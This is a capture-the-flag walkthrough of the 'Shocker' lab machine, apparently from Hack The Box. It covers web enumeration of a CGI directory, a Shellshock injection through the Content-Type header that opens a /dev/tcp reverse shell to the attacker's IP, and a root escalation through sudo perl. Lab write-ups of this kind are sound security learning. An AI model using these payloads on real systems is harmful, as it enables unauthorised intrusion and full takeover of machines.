Shocker

Personal Rating: Easy

Enumeration

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)

Wappalyzer shows php being used. Running a directory scan against the page:

feroxbuster -u http://10.10.10.56/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -C 404 -x php

I should create a wordlist that contains all specialized wordlists of the Web-Content directory. This way I can find application-specific web dirs better and quicker. This was found by feroxbuster:

http://10.10.10.56/icons/README # Apache default file
http://10.10.10.56/cgi-bin/ # Dir for cgi scripts, interesting!

This tells me that there is likely a cgi script that I can attack. I will fuzz for it:

feroxbuster -u http://10.10.10.56/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -C 404

feroxbuster -u http://10.10.10.56/cgi-bin/ -C 404 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x cgi

This article that I found when searching for cgi-bin recommends to use nikto, so I did:

CGI - HackTricksbook.hacktricks.xyz

nikto -C all -host 10.10.10.56

This yielded nothing useful and I must admit this was the first time using nikto for me.

I read a tip that cgi scripts can be found in all scripting languages, so I will do another fuzz with more extensions.

feroxbuster -u http://10.10.10.56/cgi-bin/ -C 404 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x cgi php sh js pl rb py

200 GET 
http://10.10.10.56/cgi-bin/user.sh

Shellshock Exploit

Since the box is called shocker, I will try to look for shellshock, as this is commonly abused with CGI scripts for os command injection.

Since the content type is given here, that might be where I have to inject:

This request worked directly to get a shell:

GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Content-Type: () { :;}; /bin/bash -i >& /dev/tcp/10.10.16.6/4444 0>&1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

Internal Enumeration

uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

sudo -l shew that privesc would be easy:

(root) NOPASSWD: /usr/bin/perl

Privilege Escalation

I could not write files:

This worked to get a root shell:

perl -e 'exec "/bin/sh";'